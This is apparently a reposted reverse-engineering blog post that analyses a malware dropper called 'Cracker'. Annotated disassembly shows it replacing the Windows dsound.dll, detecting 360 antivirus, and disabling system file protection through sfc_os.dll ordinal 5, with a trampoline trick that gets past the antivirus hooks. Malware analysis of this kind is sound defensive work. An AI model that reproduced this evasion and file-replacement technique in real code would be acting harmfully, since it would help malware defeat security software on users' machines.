00403FF1  |.  6A 00         push 0x0                                  ; /pOverlapped = NULL
00403FF3  |.  50            push eax                                  ; |pBytesWritten
00403FF4  |.  FF76 04       push dword ptr ds:[esi+0x4]               ; |nBytesToWrite
00403FF7  |.  FF36          push dword ptr ds:[esi]                   ; |Buffer
00403FF9  |.  53            push ebx                                  ; |hFile
00403FFA  |.  FF15 1C504000 call dword ptr ds:[<&kernel32.WriteFile>] ; \WriteFile

Next it creates system directory\system\dsound.dll.**** (random suffix) and moves dsound.dll to dsound.dll.****.

004044AE  |.  C645 DE 41    mov byte ptr ss:[ebp-0x22],0x41       ;  MoveFileEx, CopyFile
004044B2  |.  885D DF       mov byte ptr ss:[ebp-0x21],bl
004044B5  |.  FFD6          call esi
004044B7  |.  50            push eax
004044B8  |.  E8 63D4FFFF   call Cracker.00401920
004044BD  |.  59            pop ecx
004044BE  |.  8945 AC       mov [local.21],eax                    ;  [local.21] = CopyFile
004044C1  |.  59            pop ecx
004044C2  |.  8D45 D4       lea eax,[local.11]
004044C5  |.  50            push eax
004044C6  |.  57            push edi
004044C7  |.  FFD6          call esi
004044C9  |.  50            push eax
004044CA  |.  E8 51D4FFFF   call Cracker.00401920
004044CF  |.  8945 08       mov [arg.1],eax                       ;  [arg.1] = MoveFileEx
004044D2  |.  8D85 94FDFFFF lea eax,[local.155]
004044D8  |.  50            push eax                              ;  C:\Windows\system32\dsound.dll
004044D9  |.  E8 E6D2FFFF   call Cracker.004017C4
004044DE  |.  83C4 0C       add esp,0xC
004044E1  |.  85C0          test eax,eax
004044E3  |.  0F84 87000000 je Cracker.00404570
004044E9  |.  8D85 8CFBFFFF lea eax,[local.285]                   ;  C:\Windows\system32\dsound.dll.CNCL
004044EF  |.  50            push eax
004044F0  |.  E8 CFD2FFFF   call Cracker.004017C4                 ;  checks whether the file exists



Next it checks whether 360 is running:

004041AA  |.  C645 F4 33    mov byte ptr ss:[ebp-0xC],0x33
004041AE  |.  C645 F5 36    mov byte ptr ss:[ebp-0xB],0x36
004041B2  |.  C645 F6 30    mov byte ptr ss:[ebp-0xA],0x30
004041B6  |.  C645 F7 74    mov byte ptr ss:[ebp-0x9],0x74
004041BA  |.  C645 F8 72    mov byte ptr ss:[ebp-0x8],0x72
004041BE  |.  C645 F9 61    mov byte ptr ss:[ebp-0x7],0x61
004041C2  |.  C645 FA 79    mov byte ptr ss:[ebp-0x6],0x79
004041C6  |.  C645 FB 2E    mov byte ptr ss:[ebp-0x5],0x2E
004041CA  |.  C645 FC 65    mov byte ptr ss:[ebp-0x4],0x65
004041CE  |.  C645 FD 78    mov byte ptr ss:[ebp-0x3],0x78
004041D2  |.  C645 FE 65    mov byte ptr ss:[ebp-0x2],0x65            ;  360tray.exe
004041D6  |.  E8 25CEFFFF   call Cracker.00401000

call 401000 uses CreateToolhelp32Snapshot, Process32First and Process32Next to check whether 360 is present.

Stepping into the next call shows how the malware gets past 360's detection.

If 360 is present, it uses a trick to evade 360's API-call checks when calling ordinal 5 of sfc_os.dll, and so modifies the system file without 360 noticing: instead of calling the export directly, it copies the export's first five bytes into a small heap buffer, appends a jmp back to the sixth byte of the export, and calls the buffer, so an inline hook placed at the export's entry never executes.
00404069   .  C645 DF 65    mov byte ptr ss:[ebp-0x21],0x65
0040406D   .  8065 E0 00    and byte ptr ss:[ebp-0x20],0x0        ;  SeDebugPrivilege
00404071   .  6A 01         push 0x1
00404073   .  8D45 D0       lea eax,dword ptr ss:[ebp-0x30]
00404076   .  50            push eax
00404077   .  E8 B3D3FFFF   call Cracker.0040142F                 ;  elevates privileges
0040407C   .  59            pop ecx
0040407D   .  59            pop ecx
0040407E   .  C645 E4 73    mov byte ptr ss:[ebp-0x1C],0x73
00404082   .  C645 E5 66    mov byte ptr ss:[ebp-0x1B],0x66
00404086   .  C645 E6 63    mov byte ptr ss:[ebp-0x1A],0x63
0040408A   .  C645 E7 5F    mov byte ptr ss:[ebp-0x19],0x5F
0040408E   .  C645 E8 6F    mov byte ptr ss:[ebp-0x18],0x6F
00404092   .  C645 E9 73    mov byte ptr ss:[ebp-0x17],0x73
00404096   .  C645 EA 2E    mov byte ptr ss:[ebp-0x16],0x2E
0040409A   .  C645 EB 64    mov byte ptr ss:[ebp-0x15],0x64
0040409E   .  C645 EC 6C    mov byte ptr ss:[ebp-0x14],0x6C
004040A2   .  C645 ED 6C    mov byte ptr ss:[ebp-0x13],0x6C
004040A6   .  8065 EE 00    and byte ptr ss:[ebp-0x12],0x0        ;  sfc_os.dll
004040AA   .  68 04010000   push 0x104                            ; /n = 104 (260.)
004040AF   .  6A 00         push 0x0                              ; |c = 00
004040B1   .  68 2C634000   push Cracker.0040632C                 ; |s = Cracker.0040632C
004040B6   .  E8 77070000   call <jmp.&MSVCRT.memset>             ; \memset
004040BB   .  83C4 0C       add esp,0xC
004040BE   .  68 82000000   push 0x82                             ; /WideBufSize = 82 (130.)
004040C3   .  68 2C634000   push Cracker.0040632C                 ; |WideCharBuf = Cracker.0040632C
004040C8   .  FF75 08       push dword ptr ss:[ebp+0x8]           ; |/String
004040CB   .  FF15 54504000 call dword ptr ds:[<&kernel32.lstrlen>; |\lstrlenA
004040D1   .  50            push eax                              ; |StringSize
004040D2   .  FF75 08       push dword ptr ss:[ebp+0x8]           ; |StringToMap
004040D5   .  6A 00         push 0x0                              ; |Options = 0
004040D7   .  6A 00         push 0x0                              ; |CodePage = CP_ACP
004040D9   .  FF15 08504000 call dword ptr ds:[<&kernel32.MultiBy>; \MultiByteToWideChar
004040DF   .  8D45 E4       lea eax,dword ptr ss:[ebp-0x1C]
004040E2   .  50            push eax                              ; /FileName
004040E3   .  FF15 00504000 call dword ptr ds:[<&kernel32.LoadLib>; \LoadLibraryA
004040E9   .  8945 F8       mov dword ptr ss:[ebp-0x8],eax        ;  LoadLibrary("sfc_os.dll")
004040EC   .  837D F8 00    cmp dword ptr ss:[ebp-0x8],0x0
004040F0   .  75 07         jnz XCracker.004040F9
004040F2   .  33C0          xor eax,eax
004040F4   .  E9 9E000000   jmp Cracker.00404197
004040F9   >  8365 F0 00    and dword ptr ss:[ebp-0x10],0x0
004040FD   .  6A 05         push 0x5                              ;  ordinal 5
004040FF   .  FF75 F8       push dword ptr ss:[ebp-0x8]           ;  HMODULE
00404102   .  E8 19D8FFFF   call Cracker.00401920
00404107   .  59            pop ecx                               ;  gets the pointer to ordinal 5
00404108   .  59            pop ecx
00404109   .  8945 F4       mov dword ptr ss:[ebp-0xC],eax
0040410C   .  8B45 F4       mov eax,dword ptr ss:[ebp-0xC]
0040410F   .  8945 FC       mov dword ptr ss:[ebp-0x4],eax
00404112   .  0FB605 286340>movzx eax,byte ptr ds:[0x406328]
00404119   .  83E0 01       and eax,0x1
0040411C   .  85C0          test eax,eax
0040411E   .  75 22         jnz XCracker.00404142
00404120   .  A0 28634000   mov al,byte ptr ds:[0x406328]
00404125   .  0C 01         or al,0x1
00404127   .  A2 28634000   mov byte ptr ds:[0x406328],al
0040412C   .  6A 0A         push 0xA                              ; /dwBytes = A (10.)
0040412E   .  6A 08         push 0x8                              ; |dwFlags = HEAP_ZERO_MEMORY
00404130   .  FF15 50504000 call dword ptr ds:[<&kernel32.GetProc>; |[GetProcessHeap
00404136   .  50            push eax                              ; |hHeap
00404137   .  FF15 4C504000 call dword ptr ds:[<&kernel32.HeapAll>; \RtlAllocateHeap
0040413D   .  A3 24634000   mov dword ptr ds:[0x406324],eax       ;  allocates 10 bytes on the heap
00404142   >  6A 05         push 0x5                              ; /n = 5
00404144   .  FF75 FC       push dword ptr ss:[ebp-0x4]           ; | copies the first 5 bytes of the ordinal-5 function into the heap buffer
00404147   .  FF35 24634000 push dword ptr ds:[0x406324]          ; |dest = 00154808
0040414D   .  E8 DA060000   call <jmp.&MSVCRT.memcpy>             ; \memcpy
00404152   .  83C4 0C       add esp,0xC
00404155   .  A1 24634000   mov eax,dword ptr ds:[0x406324]
0040415A   .  C640 05 E9    mov byte ptr ds:[eax+0x5],0xE9        ;  byte 6 of the buffer becomes a jmp (E9)
0040415E   .  8B45 FC       mov eax,dword ptr ss:[ebp-0x4]
00404161   .  2B05 24634000 sub eax,dword ptr ds:[0x406324]
00404167   .  83E8 05       sub eax,0x5                           ;  computes the jmp displacement
0040416A   .  8B0D 24634000 mov ecx,dword ptr ds:[0x406324]
00404170   .  8941 06       mov dword ptr ds:[ecx+0x6],eax        ;  writes the jmp displacement
00404173   .  6A FF         push -0x1
00404175   .  68 2C634000   push Cracker.0040632C                 ;  UNICODE "C:\WINDOWS\system32\dsound.dll"
0040417A   .  6A 00         push 0x0
0040417C   .  E8 00000000   call Cracker.00404181                 ;  the next four instructions compute the return address 40418C and push it
00404181   $  58            pop eax
00404182   .  83C0 0B       add eax,0xB
00404185   .  50            push eax
00404186   .- FF25 24634000 jmp dword ptr ds:[0x406324]           ;  jumps to the 10-byte heap buffer
0040418C   .  FF75 F8       push dword ptr ss:[ebp-0x8]           ; /hLibModule
0040418F   .  FF15 48504000 call dword ptr ds:[<&kernel32.FreeLib>; \FreeLibrary
00404195   .  33C0          xor eax,eax
00404197   >  5F            pop edi
00404198   .  5E            pop esi
00404199   .  5B            pop ebx
0040419A   .  C9            leave
0040419B   .  C3            retn

0040455B  |. /74 13         je XCracker.00404570
0040455D  |. |8D85 8CFBFFFF lea eax,[local.285]
00404563  |. |6A 01         push 0x1
00404565  |. |50            push eax                              ;  C:\Windows\system32\dsound.dll.CNCL
00404566  |. |8D85 94FDFFFF lea eax,[local.155]
0040456C  |. |50            push eax                              ;  C:\Windows\system32\dsound.dll
0040456D  |. |FF55 08       call [arg.1]                          ;  MoveFileEx
00404570  |> \8D85 98FEFFFF lea eax,[local.90]
00404576  |.  50            push eax                              ;  C:\Windows\system32\DllCache\dsound.dll

That about covers the dropper. It looks like the main functionality lives in the DLL, which I'll look at another day. Off to bed. No summary this time.

Reposted from: https://www.cnblogs.com/microzone/p/3247485.html
